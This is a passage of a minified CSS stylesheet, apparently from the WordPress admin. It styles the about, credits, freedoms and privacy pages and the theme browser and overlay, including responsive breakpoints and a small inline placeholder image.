var(--gap); background: var(--nav-background); color: var(--nav-color); border-bottom: 3px solid var(--nav-border); } .about__header-navigation::after { display: none; } .about__header-navigation .nav-tab { margin-right: 0; padding: calc(var(--gap) * 0.75) var(--gap); float: none; font-size: 1.4em; line-height: 1; border-width: 0 0 3px; border-style: solid; border-color: transparent; background: transparent; color: inherit; } .about__header-navigation .nav-tab:hover, .about__header-navigation .nav-tab:active { background-color: var(--nav-current); color: var(--text-light); border-radius: var(--border-radius); } .about__header-navigation .nav-tab-active { margin-bottom: -3px; color: var(--nav-current); border-width: 0 0 6px; border-color: var(--nav-current); } .about__header-navigation .nav-tab-active:hover, .about__header-navigation .nav-tab-active:active { background-color: var(--nav-current); color: var(--text-light); border-color: var(--nav-current); border-radius: var(--border-radius); } @media screen and (max-width: 960px) { .about__header { padding-left: 21rem; } .about-php .about__header-title h1, .credits-php .about__header-title h1, .freedoms-php .about__header-title h1, .privacy-php .about__header-title h1, .contribute-php .about__header-title h1 { /* Fluid font size scales on browser size 600px - 960px. */ font-size: clamp(2rem, 20vw - 9rem, 4rem); } .about__header-navigation .nav-tab { padding: calc(var(--gap) * 0.75) calc(var(--gap) * 0.5); } } @media screen and (max-width: 782px) { .about__container .about__header-text { font-size: 1.4em; } .about__header-container { display: block; } .about__header { padding: var(--gap); padding-left: 17rem; } .about__header-text { margin-top: 0.5rem; } .about__header-navigation .nav-tab { margin-top: 0; margin-left: 0; font-size: 1.2em; } } @media screen and (max-width: 600px) { .about__header { min-height: auto; padding-left: var(--gap); } .about__header-navigation { display: block; } .about__header-navigation .nav-tab { display: block; margin-bottom: 0; padding: calc(var(--gap) / 2); border-right-width: 6px; border-bottom: none; } .about__header-navigation .nav-tab-active { border-bottom: none; border-right-width: 6px; } } /*------------------------------------------------------------------------------ 2.0 - Credits Page ------------------------------------------------------------------------------*/ .about__section .wp-people-group-title { margin-bottom: calc(var(--gap) * 2 - 10px); text-align: center; } .about__section .wp-people-group { margin: 0; display: flex; flex-wrap: wrap; } .about__section .wp-person { display: inline-block; vertical-align: top; box-sizing: border-box; margin-bottom: calc(var(--gap) - 10px); width: 25%; text-align: center; } .about__section .compact .wp-person { height: auto; width: 20%; } .about__section .wp-person-avatar { display: block; margin: 0 auto calc(var(--gap) / 2); width: 140px; height: 140px; border-radius: 100%; overflow: hidden; } .about__section .wp-person .gravatar { width: 140px; height: 140px; filter: grayscale(100%); } .about__section .compact .wp-person-avatar, .about__section .compact .wp-person .gravatar { width: 80px; height: 80px; } .about__section .wp-person .web { display: block; font-size: 1.4em; font-weight: 600; padding: 10px 10px 0; text-decoration: none; } .about__section .wp-person .web:hover { text-decoration: underline; } .about__section .compact .wp-person .web { font-size: 1.2em; } .about__section .wp-person .title { display: block; margin-top: 0.5em; } @media screen and (max-width: 782px) { .about__section .wp-person { width: 33%; } .about__section .compact .wp-person { width: 25%; } .about__section .wp-person-avatar, .about__section .wp-person .gravatar { width: 120px; height: 120px; } } @media screen and (max-width: 600px) { .about__section .wp-person { width: 50%; } .about__section .compact .wp-person { width: 33%; } .about__section .wp-person .web { font-size: 1.2em; } } @media screen and (max-width: 480px) { .about__section .wp-person { min-width: 100%; } .about__section .wp-person .web { font-size: 1em; } .about__section .compact .wp-person .web { font-size: 1em; } } /*------------------------------------------------------------------------------ 3.0 - Freedoms Page ------------------------------------------------------------------------------*/ .about__section .column .freedom-image { margin-bottom: var(--gap); max-height: 180px; } /*------------------------------------------------------------------------------ 4.0 - Privacy Page ------------------------------------------------------------------------------*/ .about__section .column .privacy-image { display: block; margin-right: auto; margin-left: auto; max-width: 25rem; } /*------------------------------------------------------------------------------ x.2.0 - Legacy About Styles: Global ------------------------------------------------------------------------------*/ .about-wrap { position: relative; margin: 25px 20px 0 40px; max-width: 1050px; /* readability */ font-size: 15px; } .about-wrap.full-width-layout { max-width: 1200px; } .about-wrap-content { max-width: 1050px; } .about-wrap div.updated, .about-wrap div.error, .about-wrap .notice { display: none !important; } .about-wrap hr { border: 0; height: 0; margin: 3em 0 0; border-top: 1px solid rgba(0, 0, 0, 0.1); } .about-wrap img { margin: 0; width: 100%; height: auto; vertical-align: middle; } .about-wrap .inline-svg img { max-width: 100%; width: auto; height: auto; } .about-wrap video { margin: 1.5em auto; } /* WordPress Version Badge */ .wp-badge { background: #0073aa url(../images/w-logo-white.png?ver=20160308) no-repeat; background-position: center 25px; background-size: 80px 80px; color: #fff; font-size: 14px; text-align: center; font-weight: 600; margin: 5px 0 0; padding-top: 120px; height: 40px; display: inline-block; width: 140px; text-rendering: optimizeLegibility; box-shadow: 0 1px 3px rgba(0, 0, 0, 0.2); } .svg .wp-badge { background-image: url(../images/wordpress-logo-white.svg?ver=20160308); } .about-wrap .wp-badge { position: absolute; top: 0; left: 0; } /* Tabs */ .about-wrap .nav-tab { padding-left: 15px; padding-right: 15px; font-size: 18px; line-height: 1.33333333; } /* x.2.1 - Typography */ .about-wrap h1 { margin: 0.2em 0 0 200px; padding: 0; color: #32373c; line-height: 1.2; font-size: 2.8em; font-weight: 400; } .about-wrap h2 { margin: 40px 0 0.6em; font-size: 2.7em; line-height: 1.3; font-weight: 300; text-align: center; } .about-wrap h3 { margin: 1.25em 0 0.6em; font-size: 1.4em; line-height: 1.5; } .about-wrap h4 { font-size: 16px; color: #23282d; } .about-wrap p { line-height: 1.5; font-size: 16px; } .about-wrap code, .about-wrap ol li p { font-size: 14px; font-weight: 400; } .about-wrap figcaption { font-size: 13px; text-align: center; color: white; text-overflow: ellipsis; } .about-wrap .about-description, .about-wrap .about-text { margin-top: 1.4em; font-weight: 400; line-height: 1.6; font-size: 19px; } .about-wrap .about-text { margin: 1em 0 1em 200px; color: #555d66; } /* x.2.2 - Structure */ .about-wrap .has-1-columns, .about-wrap .has-2-columns, .about-wrap .has-3-columns, .about-wrap .has-4-columns { display: grid; max-width: 800px; margin-top: 40px; margin-right: auto; margin-left: auto; } .about-wrap .column { margin-left: 20px; margin-right: 20px; } .about-wrap .is-wide { max-width: 760px; } .about-wrap .is-fullwidth { max-width: 100%; } .about-wrap .has-1-columns { display: block; max-width: 680px; margin: 0 auto 40px; } .about-wrap .has-2-columns { grid-template-columns: 1fr 1fr; } .about-wrap .has-2-columns .column:nth-of-type(2n+1) { grid-column-start: 1; } .about-wrap .has-2-columns .column:nth-of-type(2n) { grid-column-start: 2; } .about-wrap .has-2-columns.is-wider-right { grid-template-columns: 1fr 2fr; } .about-wrap .has-2-columns.is-wider-left { grid-template-columns: 2fr 1fr; } .about-wrap .has-3-columns { grid-template-columns: repeat(3, 1fr); } .about-wrap .has-3-columns .column:nth-of-type(3n+1) { grid-column-start: 1; } .about-wrap .has-3-columns .column:nth-of-type(3n+2) { grid-column-start: 2; } .about-wrap .has-3-columns .column:nth-of-type(3n) { grid-column-start: 3; } .about-wrap .has-4-columns { grid-template-columns: repeat(4, 1fr); } .about-wrap .has-4-columns .column:nth-of-type(4n+1) { grid-column-start: 1; } .about-wrap .has-4-columns .column:nth-of-type(4n+2) { grid-column-start: 2; } .about-wrap .has-4-columns .column:nth-of-type(4n+3) { grid-column-start: 3; } .about-wrap .has-4-columns .column:nth-of-type(4n) { grid-column-start: 4; } .about-wrap .column :first-child { margin-top: 0; } .about-wrap .aligncenter { text-align: center; } .about-wrap .alignleft { float: right; margin-left: 40px; } .about-wrap .alignright { float: left; margin-right: 40px; } .about-wrap .is-vertically-aligned-top { align-self: flex-start; } .about-wrap .is-vertically-aligned-center { align-self: center; } .about-wrap .is-vertically-aligned-bottom { align-self: end; } /* x.2.3 - Point Releases */ .about-wrap .point-releases { margin-top: 5px; border-bottom: 1px solid #ddd; } .about-wrap .changelog { margin-bottom: 40px; } .about-wrap .changelog.point-releases h3 { padding-top: 35px; } .about-wrap .changelog.point-releases h3:first-child { padding-top: 7px; } .about-wrap .changelog.feature-section .col { margin-top: 40px; } /*------------------------------------------------------------------------------ x.3.0 - Legacy About Styles: About Page ------------------------------------------------------------------------------*/ /* x.3.1 - Typography */ .about-wrap .lead-description { font-size: 1.5em; text-align: center; } .about-wrap .feature-section p { margin-top: 0.6em; } /* x.3.2 - Structure */ .about-wrap .headline-feature { margin: 0 auto 40px; max-width: 680px; } .about-wrap .headline-feature h2 { margin: 50px 0 0; } .about-wrap .headline-feature img { max-width: 600px; width: 100%; } /* Go to Dashboard Home link */ .about-wrap .return-to-dashboard { margin: 30px -5px 0 0; font-size: 14px; font-weight: 600; } .about-wrap .return-to-dashboard a { text-decoration: none; padding: 0 5px; } /*------------------------------------------------------------------------------ x.4.0 - Legacy About Styles: Credits & Freedoms Pages ------------------------------------------------------------------------------*/ /* Credits */ .about-wrap h2.wp-people-group { margin: 2.6em 0 1.33em; padding: 0; font-size: 16px; line-height: inherit; font-weight: 600; text-align: right; } .about-wrap .wp-people-group { padding: 0 5px; margin: 0 -5px 0 -15px; } .about-wrap .compact { margin-bottom: 0; } .about-wrap .wp-person { display: inline-block; vertical-align: top; margin-left: 10px; padding-bottom: 15px; height: 70px; width: 280px; } .about-wrap .compact .wp-person { height: auto; width: 180px; padding-bottom: 0; margin-bottom: 0; } .about-wrap .wp-person .gravatar { float: right; margin: 0 0 10px 10px; padding: 1px; width: 60px; height: 60px; } .about-wrap .compact .wp-person .gravatar { width: 30px; height: 30px; } .about-wrap .wp-person .web { margin: 6px 0 2px; font-size: 16px; font-weight: 400; line-height: 2; text-decoration: none; } .about-wrap .wp-person .title { display: block; } .about-wrap #wp-people-group-validators + p.wp-credits-list { margin-top: 0; } .about-wrap p.wp-credits-list a { white-space: nowrap; } /* Freedoms */ .freedoms-php .about-wrap ol { margin: 40px 60px; } .freedoms-php .about-wrap ol li { list-style-type: decimal; font-weight: 600; } .freedoms-php .about-wrap ol p { font-weight: 400; margin: 0.6em 0; } /*------------------------------------------------------------------------------ x.5.0 - Legacy About Styles: Media Queries ------------------------------------------------------------------------------*/ @media screen and (max-width: 782px) { .about-wrap .has-3-columns, .about-wrap .has-4-columns { grid-template-columns: 1fr 1fr; } .about-wrap .has-3-columns .column:nth-of-type(3n+1), .about-wrap .has-4-columns .column:nth-of-type(4n+1) { grid-column-start: 1; grid-row-start: 1; } .about-wrap .has-3-columns .column:nth-of-type(3n+2), .about-wrap .has-4-columns .column:nth-of-type(4n+2) { grid-column-start: 2; grid-row-start: 1; } .about-wrap .has-3-columns .column:nth-of-type(3n), .about-wrap .has-4-columns .column:nth-of-type(4n+3) { grid-column-start: 1; grid-row-start: 2; } .about-wrap .has-4-columns .column:nth-of-type(4n) { grid-column-start: 2; grid-row-start: 2; } } @media screen and (max-width: 600px) { .about-wrap .has-2-columns, .about-wrap .has-3-columns, .about-wrap .has-4-columns { display: block; } .about-wrap :not(.is-wider-right):not(.is-wider-left) .column { margin-left: 0; margin-right: 0; } .about-wrap .has-2-columns.is-wider-right, .about-wrap .has-2-columns.is-wider-left { display: grid; } } @media only screen and (max-width: 500px) { .about-wrap { margin-left: 20px; margin-right: 10px; } .about-wrap h1, .about-wrap .about-text { margin-left: 0; } .about-wrap .about-text { margin-bottom: 0.25em; } .about-wrap .wp-badge { position: relative; margin-bottom: 1.5em; width: 100%; } } @media only screen and (max-width: 480px) { .about-wrap .has-2-columns.is-wider-right, .about-wrap .has-2-columns.is-wider-left { display: block; } .about-wrap .column { margin-left: 0; margin-right: 0; } .about-wrap .has-2-columns.is-wider-right img, .about-wrap .has-2-columns.is-wider-left img { max-width: 160px; } } /*------------------------------------------------------------------------------ 16.0 - Themes ------------------------------------------------------------------------------*/ /*------------------------------------------------------------------------------ 16.1 - Manage Themes ------------------------------------------------------------------------------*/ .themes-php { overflow-y: scroll; } .themes-php #adminmenuwrap { z-index: 10001; /* above Theme Overlay */ } body.js .theme-browser.search-loading { display: none; } .theme-browser .themes { clear: both; } .themes-php .wrap h1 .button { margin-left: 20px; } /* Search form */ .themes-php .search-form { display: inline-flex; align-items: center; position: relative; top: 0; gap: .5rem; width: 100%; justify-content: end; } .themes-php .wp-filter-search { position: relative; margin: 0; width: 280px; } /* Position admin messages */ .theme .notice, .theme .notice.is-dismissible { left: 0; margin: 0; position: absolute; right: 0; top: 0; } /** * Main theme element * (has flexible margins) */ .theme-browser .theme { cursor: pointer; float: left; margin: 0 4% 4% 0; position: relative; width: 30.6%; background: #ffffff; border: 1px solid rgb(0, 0, 0, 0.1); border-radius: 8px; box-sizing: border-box; overflow: hidden; } .theme-browser .theme:nth-child(3n) { margin-right: 0; } .theme-browser .theme:hover, .theme-browser .theme.focus { cursor: pointer; } .theme-browser .theme .theme-name { font-size: 15px; font-weight: 600; height: 18px; margin: 0; padding: 16px 15px; border-top: 1px solid rgb(0, 0, 0, 0.1); overflow: hidden; white-space: nowrap; text-overflow: ellipsis; background: #ffffff; } /* Activate and Customize buttons, shown on hover and focus */ .theme-browser .theme .theme-actions { -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)"; opacity: 0; transition: opacity 0.1s ease-in-out; height: auto; background: rgba(246, 247, 247, 0.7); border-left: 1px solid rgba(0, 0, 0, 0.05); } .theme-browser .theme:hover .theme-actions, .theme-browser .theme.focus .theme-actions { -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)"; opacity: 1; } .theme-browser .theme .theme-actions .button-primary { margin-right: 3px; } /* Use compact size for space-constrained theme cards */ .theme-browser .theme .theme-actions .button.updated-message, .theme-browser .theme .theme-actions .button.updating-message, .theme-browser .theme .theme-actions .button { float: none; margin-left: 3px; } .theme-browser .theme .theme-actions .button.updated-message::before, .theme-browser .theme .theme-actions .button.updating-message::before { line-height: 1; vertical-align: text-bottom; position: relative; top: 2px; } /* Secondary buttons need white background for visibility on semi-transparent overlay */ .theme-browser .theme .theme-actions .button:not(.button-primary) { background: #fff; } .theme-browser .theme .theme-actions .button:not(.button-primary):hover { background: #f0f0f0; } .theme-browser .theme .theme-actions .button:not(.button-primary):focus { background: #fff; } /** * Theme Screenshot * * Has a fixed aspect ratio of 1.5 to 1 regardless of screenshot size * It is also responsive. */ .theme-browser .theme .theme-screenshot { display: block; overflow: hidden; position: relative; -webkit-backface-visibility: hidden; /* Prevents flicker of the screenshot on hover. */ transition: opacity 0.2s ease-in-out; } .theme-browser .theme .theme-screenshot:after { content: ""; display: block; padding-top: 66.66666%; /* using a 3/2 aspect ratio */ } .theme-browser .theme .theme-screenshot img { height: auto; position: absolute; left: 0; top: 0; width: 100%; transition: opacity 0.2s ease-in-out; } .theme-browser .theme:hover .theme-screenshot, .theme-browser .theme.focus .theme-screenshot { background: #fff; } .theme-browser.rendered .theme:hover .theme-screenshot img, .theme-browser.rendered .theme.focus .theme-screenshot img { opacity: 0.4; } .theme-browser .theme .more-details { -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)"; opacity: 0; position: absolute; top: 35%; right: 20%; left: 20%; width: 60%; background: #1d2327; background: rgba(0, 0, 0, 0.7); color: #fff; font-size: 15px; text-shadow: 0 1px 0 rgba(0, 0, 0, 0.6); -webkit-font-smoothing: antialiased; font-weight: 600; padding: 15px 12px; text-align: center; border-radius: 3px; border: none; transition: opacity 0.1s ease-in-out; cursor: pointer; } .theme-browser .theme .more-details:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); } .theme-browser .theme.focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .theme-browser .theme.focus .more-details { opacity: 1; } /* Current theme needs to have its action always on view */ .theme-browser .theme.active.focus .theme-actions { display: block; } .theme-browser.rendered .theme:hover .more-details, .theme-browser.rendered .theme.focus .more-details { -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)"; opacity: 1; } /** * The currently active theme */ .theme-browser .theme.active .theme-name { background: #1d2327; color: #fff; padding-right: 115px; font-weight: 300; box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.5); } .theme-browser .customize-control .theme.active .theme-name { padding-right: 15px; } .theme-browser .theme.active .theme-name span { font-weight: 600; } .theme-browser .theme.active .theme-actions { background: transparent; border-left: none; opacity: 1; } .theme-browser .theme.active .theme-actions .button-primary { border-color: #fff; } .theme-id-container { position: relative; } .theme-browser .theme.active .theme-actions, .theme-browser .theme .theme-actions { position: absolute; top: 50%; transform: translateY(-50%); right: 0; padding: 9px 12px; } .theme-browser .theme:not(.active) .theme-actions { box-shadow: inset 0 1px 0 rgba(0, 0, 0, 0.1); } .theme-browser .theme.active .theme-actions .button-primary { margin-right: 0; } /* Active theme secondary buttons need white background for visibility on dark overlay */ .theme-browser .theme.active .theme-actions .button:not(.button-primary) { background: #fff; } .theme-browser .theme.active .theme-actions .button:not(.button-primary):hover { background: #f0f0f0; } .theme-browser .theme.active .theme-actions .button:not(.button-primary):focus { background: #fff; } .theme-browser .theme .theme-author { background: #1d2327; color: #f0f0f1; display: none; font-size: 14px; margin: 0 10px; padding: 5px 10px; position: absolute; bottom: 56px; } .theme-browser .theme.display-author .theme-author { display: block; } .theme-browser .theme.display-author .theme-author a { color: inherit; } /** * Add new theme */ .theme-browser .theme.add-new-theme { background: transparent; border: none; overflow: visible; } .theme-browser .theme.add-new-theme a { text-decoration: none; display: block; position: relative; z-index: 1; } .theme-browser .theme.add-new-theme a:after { display: block; content: ""; background: transparent; background: rgba(0, 0, 0, 0); position: absolute; top: 0; left: 0; right: 0; bottom: 0; padding: 0; text-shadow: none; border: 5px dashed #dcdcde; border: 5px dashed rgba(0, 0, 0, 0.1); box-sizing: border-box; } .theme-browser .theme.add-new-theme span:after { background: #dcdcde; background: rgba(140, 143, 148, 0.1); border-radius: 50%; display: inline-block; content: "\f132"; content: "\f132" / ''; -webkit-font-smoothing: antialiased; font: normal 74px/115px dashicons; width: 100px; height: 100px; vertical-align: middle; text-align: center; color: #8c8f94; position: absolute; top: 30%; left: 50%; margin-left: -50px; text-indent: -4px; padding: 0; text-shadow: none; z-index: 4; } .rtl .theme-browser .theme.add-new-theme span:after { text-indent: 4px; } .theme-browser .theme.add-new-theme a:hover .theme-screenshot, .theme-browser .theme.add-new-theme a:focus .theme-screenshot { background: none; } .theme-browser .theme.add-new-theme a:hover span:after, .theme-browser .theme.add-new-theme a:focus span:after { background: #fff; color: #2271b1; } .theme-browser .theme.add-new-theme a:hover:after, .theme-browser .theme.add-new-theme a:focus:after { border-color: transparent; color: #fff; background: #2271b1; content: ""; } .theme-browser .theme.add-new-theme .theme-name { background: none; border: none; text-align: center; font-weight: 400; position: relative; top: 0; margin-top: -18px; padding-top: 0; padding-bottom: 48px; } .theme-browser .theme.add-new-theme a:hover .theme-name, .theme-browser .theme.add-new-theme a:focus .theme-name { color: #fff; z-index: 2; } /** * Theme Overlay * Shown when clicking a theme */ .theme-overlay .theme-backdrop { position: absolute; left: -20px; right: 0; top: 0; bottom: 0; background: #f0f0f1; background: rgba(240, 240, 241, 0.9); z-index: 10000; /* Over WP Pointers. */ min-height: calc(100vh - var(--wp-admin--admin-bar--height, 32px)); } .theme-overlay .theme-header { position: absolute; top: 0; left: 0; right: 0; height: 48px; border-bottom: 1px solid #dcdcde; } .theme-overlay .theme-header button { padding: 0; } .theme-overlay .theme-header .close { cursor: pointer; height: 48px; width: 50px; text-align: center; float: right; border: 0; border-left: 1px solid #dcdcde; background-color: transparent; transition: color .1s ease-in-out, background .1s ease-in-out; } .theme-overlay .theme-header .close:before { font: normal 22px/50px dashicons !important; color: #787c82; display: inline-block; content: "\f335"; content: "\f335" / ''; font-weight: 300; } /* Left and right navigation */ .theme-overlay .theme-header .right, .theme-overlay .theme-header .left { cursor: pointer; color: #787c82; background-color: transparent; height: 48px; width: 54px; float: left; text-align: center; border: 0; border-right: 1px solid #dcdcde; transition: color .1s ease-in-out, background .1s ease-in-out; } .theme-overlay .theme-header .close:focus, .theme-overlay .theme-header .close:hover, .theme-overlay .theme-header .right:focus, .theme-overlay .theme-header .right:hover, .theme-overlay .theme-header .left:focus, .theme-overlay .theme-header .left:hover { background: #dcdcde; border-color: #c3c4c7; color: #000; } .theme-overlay .theme-header .close:focus:before, .theme-overlay .theme-header .close:hover:before { color: #000; } .theme-overlay .theme-header .close:focus, .theme-overlay .theme-header .right:focus, .theme-overlay .theme-header .left:focus { box-shadow: none; outline: none; } .theme-overlay .theme-header .left.disabled, .theme-overlay .theme-header .right.disabled, .theme-overlay .theme-header .left.disabled:hover, .theme-overlay .theme-header .right.disabled:hover { color: #c3c4c7; background: inherit; cursor: inherit; } .theme-overlay .theme-header .right:before, .theme-overlay .theme-header .left:before { font: normal 20px/50px dashicons !important; display: inline; font-weight: 300; } .theme-overlay .theme-header .left:before { content: "\f341"; content: "\f341" / ''; } .theme-overlay .theme-header .right:before { content: "\f345"; content: "\f345" / ''; } .theme-overlay .theme-wrap { clear: both; position: fixed; top: 9%; left: 190px; right: 30px; bottom: 3%; background: #fff; box-shadow: 0 1px 20px 5px rgba(0, 0, 0, 0.1); z-index: 10000; /* Over WP Pointers. */ box-sizing: border-box; -webkit-overflow-scrolling: touch; } body.folded .theme-browser ~ .theme-overlay .theme-wrap { left: 70px; } .theme-overlay .theme-about { position: absolute; top: 49px; bottom: 57px; left: 0; right: 0; overflow: auto; padding: 2% 4%; } .theme-overlay .theme-actions { position: absolute; text-align: center; bottom: 0; left: 0; right: 0; padding: 10px 25px 5px; background: #f6f7f7; z-index: 30; box-sizing: border-box; border-top: 1px solid #f0f0f1; display: flex; justify-content: center; gap: 5px; } .theme-overlay .theme-actions .button { margin-bottom: 5px; } /* Hide-if-customize for items we can't add classes to */ .customize-support .theme-overlay .theme-actions a[href="themes.php?page=custom-header"], .customize-support .theme-overlay .theme-actions a[href="themes.php?page=custom-background"] { display: none; } .broken-themes a.delete-theme, .theme-overlay .theme-actions .delete-theme { color: #b32d2e; text-decoration: none; border-color: transparent; box-shadow: none; background: transparent; } .broken-themes a.delete-theme:hover, .broken-themes a.delete-theme:focus, .theme-overlay .theme-actions .delete-theme:hover, .theme-overlay .theme-actions .delete-theme:focus { background: #b32d2e; color: #fff; border-color: #b32d2e; box-shadow: 0 0 0 1px #b32d2e; } .theme-overlay .theme-actions .active-theme, .theme-overlay.active .theme-actions .inactive-theme { display: none; } .theme-overlay .theme-actions .inactive-theme, .theme-overlay.active .theme-actions .active-theme { display: block; } /** * Theme Screenshots gallery */ .theme-overlay .theme-screenshots { float: left; margin: 0 30px 0 0; width: 55%; max-width: 1200px; /* Recommended theme screenshot width, set here to avoid stretching */ text-align: center; } /* First screenshot, shown big */ .theme-overlay .screenshot { border: 1px solid #fff; box-sizing: border-box; overflow: hidden; position: relative; box-shadow: 0 0 0 1px rgba(0, 0, 0, 0.2); } .theme-overlay .screenshot:after { content: ""; display: block; padding-top: 75%; /* using a 4/3 aspect ratio */ } .theme-overlay .screenshot img { height: auto; position: absolute; left: 0; top: 0; width: 100%; } /* Handles old 300px screenshots */ .theme-overlay.small-screenshot .theme-screenshots { position: absolute; width: 302px; } .theme-overlay.small-screenshot .theme-info { margin-left: 350px; width: auto; } /* Other screenshots, shown small and square */ .theme-overlay .screenshot.thumb { background: #c3c4c7; border: 1px solid #f0f0f1; float: none; display: inline-block; margin: 10px 5px 0; width: 140px; height: 80px; cursor: pointer; } .theme-overlay .screenshot.thumb:after { content: ""; display: block; padding-top: 100%; /* using a 1/1 aspect ratio */ } .theme-overlay .screenshot.thumb img { cursor: pointer; height: auto; position: absolute; left: 0; top: 0; width: 100%; height: auto; } .theme-overlay .screenshot.selected { background: transparent; border: 2px solid #72aee6; } .theme-overlay .screenshot.selected img { opacity: 0.8; } /* No screenshot placeholder */ .theme-browser .theme .theme-screenshot.blank, .theme-overlay .screenshot.blank { background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAYAAADED76LAAAALElEQVQYGWO8d+/efwYkoKioiMRjYGBC4WHhUK6A8T8QIJt8//59ZC493AAAQssKpBK4F5AAAAAASUVORK5CYII=); } /** * Theme heading information */ .theme-overlay .theme-info { width: 40%; float: left; } .theme-overlay .current-label { background: #2c3338; color: #fff; font-size: 11px; display: inline-block; padding: 2px 8px; border-radius: 2px; margin: 0 0 -10px; -webkit-user-select: none; user-select: none; } .theme-overlay .theme-name { color: #1d2327; font-size: 32px; font-weight: 100; margin: 10px 0 0; line-height: 1.3; word-wrap: break-word; overflow-wrap: break-word; } .theme-overlay .theme-version { color: #646970; font-size: 13px; font-weight: 400; float: none; display: inline-block; margin-left: 10px; } .theme-overlay .theme-author { margin: 15px 0 25px; color: #646970; font-size: 16px; font-weight: 400; line-height: inherit; } .theme-overlay .toggle-auto-update { /* Better align spin icon and text. */ display: inline-flex; align-items: center; /* Prevents content after the auto-update toggler from jumping down and up. */ min-height: 20px; /* Same height as the spinning dashicon. */ vertical-align: top; } .theme-overlay .theme-autoupdate .toggle-auto-update { text-decoration: none; } .theme-overlay .theme-autoupdate .toggle-auto-update .label { text-decoration: underline; } .theme-overlay .theme-description { color: #50575e; font-size: 15px; font-weight: 400; line-height: 1.5; margin: 30px 0 0; } .theme-overlay .theme-tags { border-top: 3px solid #f0f0f1; color: #646970; font-size: 13px; font-weight: 400; margin: 30px 0 0; padding-top: 20px; } .theme-overlay .theme-tags span { color: #3c434a; font-weight: 600; margin-right: 5px; } .theme-overlay .parent-theme { background: #fff; border: 1px solid #f0f0f1; border-left: 4px solid #72aee6; font-size: 14px; font-weight: 400; margin-top: 30px; padding: 10px 10px 10px 20px; } .theme-overlay .parent-theme strong { font-weight: 600; } /** * Single Theme Mode * Displays detailed view inline when a user has no switch capabilities */ .single-theme .theme-overlay .theme-backdrop, .single-theme .theme-overlay .theme-header, .single-theme .theme { display: none; } .single-theme .theme-overlay .theme-wrap { clear: both; min-height: 330px; position: relative; left: auto; right: auto; top: auto; bottom: auto; z-index: 10; } .single-theme .theme-overlay .theme-about { padding: 30px 30px 70px; position: static; } .single-theme .theme-overlay .theme-actions { position: absolute; } /** * Basic Responsive structure... * * Shuffles theme columns around based on screen width */ @media only screen and (min-width: 2000px) { #wpwrap .theme-browser .theme { width: 17.6%; margin: 0 3% 3% 0; } #wpwrap .theme-browser .theme:nth-child(3n), #wpwrap .theme-browser .theme:nth-child(4n) { margin-right: 3%; } #wpwrap .theme-browser .theme:nth-child(5n) { margin-right: 0; } } @media only screen and (min-width: 1680px) { .theme-overlay .theme-wrap { width: 1450px; margin: 0 auto; } } /* Maximum screenshot width reaches 440px */ @media only screen and (min-width: 1640px) { .theme-browser .theme { width: 22.7%; margin: 0 3% 3% 0; } .theme-browser .theme .theme-screenshot:after { padding-top: 75%; /* using a 4/3 aspect ratio */ } .theme-browser .theme:nth-child(3n) { margin-right: 3%; } .theme-browser .theme:nth-child(4n) { margin-right: 0; } } /* Maximum screenshot width reaches 440px */ @media only screen and (max-width: 1120px) { .theme-browser .theme { width: 47.5%; margin-right: 0; } .theme-browser .theme:nth-child(even) { margin-right: 0; } .theme-browser .theme:nth-child(odd) { margin-right: 5%; } } /* Admin menu is folded */ @media only screen and (max-width: 960px) { .theme-overlay .theme-wrap { left: 65px; } } @media only screen and (max-width: 782px) { body.folded .theme-overlay .theme-wrap, .theme-overlay .theme-wrap { top: 0; /* The adminmenu isn't fixed on mobile, so this can use the full viewport height */ right: 0; bottom: 0; left: 0; padding: 70px 20px 20px; border: none; z-index: 100000; /* should overlap #wpadminbar. */ position: fixed; } .theme-browser .theme.active .theme-name span { /* Hide the "Active: " label on smaller screens. */ display: none; } .theme-overlay .theme-screenshots { width: 40%; } .theme-overlay .theme-info { width: 50%; } .single-theme .theme-wrap { padding: 10px; } .theme-browser .theme .theme-actions { padding: 5px 10px 4px; } .theme-overlay.small-screenshot .theme-screenshots { position: static; float: none; max-width: 302px; } .theme-overlay.small-screenshot .theme-info { margin-left: 0; width: auto; } .theme:not(.active):hover .theme-actions, .theme:not(.active):focus .theme-actions, .theme:hover .more-details, .theme.focus .more-details { display: none; } .theme-browser.rendered .theme:hover .theme-screenshot img, .theme-browser.rendered .theme.focus .theme-screenshot img { opacity: 1.0; } } @media only screen and (max-width: 480px) { .theme-browser .theme { width: 100%; margin-right: 0; } .theme-browser .theme:nth-child(2n), .theme-browser .theme:nth-child(3n) { margin-right: 0; } .theme-overlay .theme-about { bottom: 105px; } .theme-overlay .theme-actions { padding-left: 4%; padding-right: 4%; } .theme-install-php .wp-filter .filter-count { margin-top: 10px; } } @media only screen and (max-width: 650px) { .theme-overlay .theme-description { margin-left: 0; } .theme-overlay .theme-actions .delete-theme { position: relative; right: auto; bottom: auto; } .theme-overlay .theme-actions .inactive-theme { display: inline; } .theme-overlay .theme-screenshots { width: 100%; float: none; margin: 0; } .theme-overlay .theme-info { width: 100%; } .theme-overlay .theme-author { margin: 5px 0 15px; } .theme-overlay .current-label { margin-top: 10px; font-size: 13px; } .themes-php .wp-filter-search { width: 100%; } .theme-install-php .wp-filter p.search-box { display: grid; row-gap: .5rem; } .theme-browser .theme.add-new-theme span:after { font: normal 60px/90px dashicons; width: 80px; height: 80px; top: 30%; left: 50%; text-indent: 0; margin-left: -40px; } .single-theme .theme-wrap { margin: 0 -12px 0 -10px; padding: 10px; } .single-theme .theme-overlay .theme-about { padding: 10px; overflow: visible; } .single-theme .current-label { display: none; } .single-theme .theme-overlay .theme-actions { position: static; } } .broken-themes { clear: both; } .broken-themes table { text-align: left; width: 50%; border-spacing: 3px; padding: 3px; } /*------------------------------------------------------------------------------ 16.2 - Install Themes ------------------------------------------------------------------------------*/ .update-php .wrap { max-width: 40rem; } /* Already installed theme */ .theme-browser .theme .theme-installed { background: #2271b1; } .theme-browser .theme .notice-success p:before { color: #68de7c; content: 